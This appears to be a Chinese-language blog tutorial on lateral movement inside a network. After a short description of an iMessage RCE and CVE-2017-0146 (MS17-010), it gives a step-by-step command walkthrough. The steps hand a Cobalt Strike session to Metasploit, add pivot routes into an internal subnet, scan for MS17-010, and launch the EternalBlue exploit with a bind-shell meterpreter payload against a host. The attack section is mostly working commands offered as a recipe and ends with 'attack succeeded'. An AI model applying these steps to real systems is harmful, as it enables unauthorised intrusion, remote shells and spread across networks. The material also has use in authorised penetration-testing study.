横向提权

横向提权

横向提权(Lateral Privilege Escalation)是一种攻击技术,攻击者在成功入侵一个系统后,通过该系统进一步访问其他系统或网络资源,从而提升自己在目标网络中的权限或控制范围。这种技术常见于内网攻击中,攻击者通过横向移动达到更高的特权目标。

 次点击
7 分钟阅读

iMessage的RCE(远程代码执行)漏洞:2017年发现的一些漏洞使攻击者能够通过特制的消息触发iOS设备的远程代码执行。这些漏洞可以在接收带有恶意内容的iMessage时让攻击者控制设备。

CVE-2017-0146

CVE-2017-0146 是一项影响 Microsoft Windows 操作系统的远程代码执行漏洞,属于 MS17-010 安全更新的一部分。该漏洞源于 Windows 的 SMBv1(Server Message Block 1.0)协议处理特定请求的方式,攻击者可通过发送特制的数据包来远程执行恶意代码。

  1. 把Web服务器的会话转交给MSF(因为CS虽说可以利用插件进行MS17_010的检测,但是CS不支持漏洞的利用)。

  2. CS先创建一个监听器,Host就是MSF服务器的地址。
    再回到MSF这边,因为CS设置的监听器是反向的,所以MSF的payload也要反向的。

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 0.0.0.0
set lport 2222
  1. 再回到CS执行下面命令,即可把权限移交到MSF。

spawn msf //msf是监听器的名字
  1. 因为域内主机都是在内网中的,想用msf去扫描漏洞的话得添加路由,先查看路由发现为空。

run autoroute -p
  1. 添加当前路由表。

run post/multi/manage/autoroute
  1. 此时便可以利用MSF的漏洞检测模块去检测MS17_010漏洞。

use auxiliary/scanner/smb/smb_ms17_010
  1. 设置参数。

set rhosts 192.168.22.27-30 //设置扫描目标段
set threads 5 //设置扫描线程数
run
  1. 利用MSF的攻击模块。

use exploit/windows/smb/ms17_010_eternalblue
  1. 设置参数
    要设置正向连接(目标主机是不出网的。不出网反向连接目标主机找不到,那因为上面添加Web服务器充当路由,流量经过Web服务器再到目标主机。)

set payload windows/x64/meterpreter/bind_tcp //正向连接上线
set rhost 192.168.22.30 //设置连接目标

攻击成功!

© 本文著作权归作者所有,未经许可不得转载使用。